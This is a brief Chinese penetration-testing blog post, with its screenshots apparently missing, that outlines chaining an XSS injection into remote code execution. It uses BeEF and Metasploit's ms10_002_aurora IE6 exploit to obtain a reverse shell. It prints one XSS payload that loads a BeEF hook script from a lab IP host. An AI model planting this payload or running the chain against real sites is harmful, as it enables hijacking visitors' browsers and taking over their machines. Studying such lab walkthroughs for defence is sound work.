一次xss到rce

2019-03-18 阅读(1607) 分类：Web安全 / 渗透测试百度已收录

administrator

发表文章数：115

热门标签

首页 » Web安全 » 一次xss到rce

本次beef结合msf 完成整个攻击过程
启动beef
beef

xss代码（beef生成）：
<
sCRiPt> sRC=http://172.16.3.36:3000/hook.js>
本地演示：

xss执行

配置msf
payload
ms10_002_aurora （ie6 极光漏洞）
配置：

开始监听：

手动游览器执行：

（使用beef重定向到该url也可以）
上线：

反弹shell

标签：Web安全 xss

免责声明:本站所提供工具、技术文章,仅供技术学习交流、请勿用于非法行为,请遵守相关法律规定,否则后果自负。作者:administrator，转载或复制请以超链接形式并注明出处大老李的Blog|渗透测试论坛|红蓝对抗|大型Web安全问答社区。
原文地址：《一次xss到rce》发布于2019-03-18